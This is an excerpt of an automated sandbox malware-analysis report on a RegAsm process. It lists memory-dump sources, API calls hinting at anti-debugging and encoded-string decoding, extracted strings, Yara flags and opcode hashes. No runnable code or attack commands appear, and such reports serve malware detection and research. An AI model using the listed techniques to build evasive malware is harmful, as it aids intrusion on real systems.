                                                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32 ref: 19A1365A
                                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 19A13698
                                                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 19A136AB
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 19A136F3
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 19A1370E
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Locale$InfoValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                              • String ID: YHI;
                                                                                                                                                                                                                                                              • API String ID: 3475089800-2037931556
                                                                                                                                                                                                                                                              • Opcode ID: 5c98da2e47f7918bb6187bf6459694af345bba240002427335a853943f2f496e
                                                                                                                                                                                                                                                              • Instruction ID: 51fa16fa20be6b2fa6a559cd9d543e9a27af91acb9e3cff43af731169eaa8f3c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c98da2e47f7918bb6187bf6459694af345bba240002427335a853943f2f496e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 655150B5A00215AFDF04DFA9DC80AAE77BCEF44B40F594479E915EF280EB70A549CB60
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • , xrefs: 198C5334
                                                                                                                                                                                                                                                              • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 198C5264
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                                                                                                                                                                                                                                              • API String ID: 0-69911113
                                                                                                                                                                                                                                                              • Opcode ID: c2473dc5b89e2494697acc2fc6f2902e27f0c1d089006db3e70337df73452b4e
                                                                                                                                                                                                                                                              • Instruction ID: 8c6c02a5f1f4de1e5179451594e933db381af18b2a87ee6d87e8ee67be4c37fc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2473dc5b89e2494697acc2fc6f2902e27f0c1d089006db3e70337df73452b4e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5418175A04301AFDB00DF29DC80B5AB7E9FF98304F49452DF948AB251D772E951CBA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
                                                                                                                                                                                                                                                              • Instruction ID: 881fd14810846ee314b9ece0cb919883e00d19044ec9d0e45abc6d8f1e32f1b5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9941F675500B02AFCB019F29CC80A1BB7F8FF45310F08962CFA6886250E775F955CBA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 7333b6ae7f438e9f13264d5ec02f2a13494b89a42daa96bea5ba5dfb117743ce
                                                                                                                                                                                                                                                              • Instruction ID: a1a0f9a0f257d57b58759658e95c4b310872dcbe203b0dc5a81bf583d425540f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7333b6ae7f438e9f13264d5ec02f2a13494b89a42daa96bea5ba5dfb117743ce
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61B19EB4804746AFD700CF39C880B1BB7E8BF95705F489A1DF85996280E779E594CB92
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
                                                                                                                                                                                                                                                              • Instruction ID: 7175e33c718afa148963fd5a951450ebcc4e67d57430ebe88650da96108c3bf5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A4123B52043019FDB14DF28C884E66B7F4FF98312F58446DE8898B691E772FA55CBA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 7c47665ceff2693bb0f0888cf98311f0e1bcc986260295014b90568168a65808
                                                                                                                                                                                                                                                              • Instruction ID: c7889d46b62831b29a5478e543dd813bb527290ae742b75637769b5058f1f589
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c47665ceff2693bb0f0888cf98311f0e1bcc986260295014b90568168a65808
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A431BE396002009FD314CF28D885A66B3E4FF80329B5D45ADE9428F3A2D722FC95DB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408286
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(0040858B,00000001,?,00000014,00000000,00000000,?,0040858B,00000014), ref: 004082A0
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(0040858B,00000000,?,0040858B,00000014), ref: 004082AA
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00408312
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00423BB7,00423BBB), ref: 00408339
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00423BB7,00423BBE), ref: 00408351
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1498829745-0
                                                                                                                                                                                                                                                              • Opcode ID: 86e97159dc29741583b43b5bf0577f380440bf8f7e26ec31949e0f6a887f12a0
                                                                                                                                                                                                                                                              • Instruction ID: 25ca3563e8dc449186963e0bf0a6fab518f3cb9fde527b24148f19c1c0cbe8d8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86e97159dc29741583b43b5bf0577f380440bf8f7e26ec31949e0f6a887f12a0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1521AC71A00219EFCB009F94ED44AEE7BBDBF04784F0004BAF901F2240EB399B559BA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 198A2001
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                                                                                                                                                                                                                                              • API String ID: 0-914542581
                                                                                                                                                                                                                                                              • Opcode ID: 0cf91604e7cb0e8619bf82a2f514fdebe31c49219dfffc6eaca376ba51d3e4ad
                                                                                                                                                                                                                                                              • Instruction ID: 81b037d8cdb595edf8d14b33dfcb6195296353f7ae00c78a22adc5e55b2c23c4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0cf91604e7cb0e8619bf82a2f514fdebe31c49219dfffc6eaca376ba51d3e4ad
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F21DDB9500215AFDB20AF69DC80F5677EEFF24714F48841CF94497161E362F860CBA9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,19A13688,?,00000000), ref: 19A13399
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,19A13688,?,00000000), ref: 19A133C2
                                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,19A13688,?,00000000), ref: 19A133D7
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                              • Opcode ID: 3fde05c3e6c62814b067315dab74e87ec228e5014e245ab8324b8f12b39e3bda
                                                                                                                                                                                                                                                              • Instruction ID: 0b7c886d93d6a1aad63378e2ded56061333120dca21659776dcab1caedb6416e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fde05c3e6c62814b067315dab74e87ec228e5014e245ab8324b8f12b39e3bda
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F219532700243AAE7158F65C906A8B73AEAF50F90B8F8474E949DF184EF32D94DC358
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0041C13A
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041C14F
                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00426DF0), ref: 0041C15A
                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0041C176
                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 0041C17D
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                                                                              • Opcode ID: 926d9496fb6b5781bfe50d80a180537aa0dd22fad9db7dff5851091f163dd7a5
                                                                                                                                                                                                                                                              • Instruction ID: 5c43d2e48c6e04b75f2a9b1155548d19a2e244ba8729a6803041e9bd8e9cbae7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 926d9496fb6b5781bfe50d80a180537aa0dd22fad9db7dff5851091f163dd7a5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B21DDF9A00304DFD720DF65FD99754BBB2BB48314F52202AE80A87661E7B45981CF89
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00402445
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,00000014,00000000,00000000), ref: 0040246B
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,00000000,00000000,00000000), ref: 00402485
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
